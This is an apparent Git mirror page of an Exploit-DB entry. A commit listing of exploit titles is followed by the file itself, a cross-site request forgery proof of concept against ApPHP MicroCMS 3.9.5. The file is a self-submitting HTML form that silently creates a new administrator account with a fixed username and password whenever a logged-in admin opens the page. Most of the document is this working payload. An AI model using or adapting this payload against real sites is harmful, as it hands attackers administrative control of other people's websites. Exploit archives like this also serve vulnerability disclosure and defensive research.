bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40517.html
Offensive Security 01eb066d9d DB: 2016-10-13 
11 new exploits

IBM AIX 5.2/5.3 FTP Client - Local Buffer Overflow

Yahoo! Widgets Engine 4.0.3 - YDPCTL.dll ActiveX Control Buffer Overflow

Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
Simple PHP Blog 0.8.4 - (Add Admin) Cross-Site Request Forgery

miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
miniblog 1.0.1 - (Add New Post) Cross-Site Request Forgery

PHP Press Release - Cross-Site Request Forgery (Add Admin)
PHP Press Release - (Add Admin) Cross-Site Request Forgery
Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)
Spacemarc News - Cross-Site Request Forgery (Add New Post)
Minecraft Launcher - Insecure File Permissions Privilege Escalation
Maian Weblog 4.0 - (Add New Post) Cross-Site Request Forgery
Spacemarc News - (Add New Post) Cross-Site Request Forgery
Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation
sheed AntiVirus - Unquoted Service Path Privilege Escalation
AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities
sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation
AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities

Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)
Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)

ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
ApPHP MicroBlog 1.0.2 - (Add New Author) Cross-Site Request Forgery
Subversion 1.6.6 / 1.6.12 - Code Execution
Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption
Cisco Webex Player T29.10 - '.ARF' Out-of-Bounds Memory Corruption
Adobe Flash Player 23.0.0.162 - '.SWF' ConstantPool Critical Memory Corruption
Categorizator 0.3.1 - SQL Injection
NetBilletterie 2.8 - Multiple Vulnerabilities
ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
OpenCimetiere v3.0.0-a5 - Blind SQL Injection
Android - Binder Generic ASLR Leak
ApPHP MicroCMS 3.9.5 - (Add Admin) Cross-Site Request Forgery
2016-10-13 05:01:17 +00:00

53 lines
2.6 KiB
HTML
Executable file
Raw Blame History

# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin (Main))
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : http://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
*-* Vulnerable link : http://site_name/path/index.php?admin=admins_management
############ CSRF PoC #############
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/index.php?admin=admins_management" method="POST" enctype="multipart/form-data">
<input type="hidden" name="mg&#95;prefix" value="&#13;" />
<input type="hidden" name="mg&#95;action" value="create" />
<input type="hidden" name="mg&#95;rid" value="&#45;1" />
<input type="hidden" name="mg&#95;sorting&#95;fields" value="&#13;" />
<input type="hidden" name="mg&#95;sorting&#95;types" value="&#13;" />
<input type="hidden" name="mg&#95;page" value="1" />
<input type="hidden" name="mg&#95;operation" value="&#13;" />
<input type="hidden" name="mg&#95;operation&#95;type" value="&#13;" />
<input type="hidden" name="mg&#95;operation&#95;field" value="&#13;" />
<input type="hidden" name="mg&#95;search&#95;status" value="&#13;" />
<input type="hidden" name="mg&#95;language&#95;id" value="&#13;" />
<input type="hidden" name="mg&#95;operation&#95;code" value="yh0ox75feagwqbccp8ef" />
<input type="hidden" name="token" value="dbe0e51cf3a5ce407336a94f52043157" />
<input type="hidden" name="date&#95;lastlogin" value="&#13;" />
<input type="hidden" name="date&#95;created" value="2016&#45;10&#45;12&#32;21&#58;14&#58;06" />
<input type="hidden" name="first&#95;name" value="meryem" />
<input type="hidden" name="last&#95;name" value="ak" />
<input type="hidden" name="email" value="mmm&#64;yopmail&#46;com" />
<input type="hidden" name="user&#95;name" value="meryem" />
<input type="hidden" name="password" value="meryem" />
<input type="hidden" name="account&#95;type" value="admin" />
<input type="hidden" name="preferred&#95;language" value="en" />
<input type="hidden" name="is&#95;active" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
############ ########## ############
*-* Thanks Meryem AKDOĞAN *-*
Reference in a new issue View git blame Copy permalink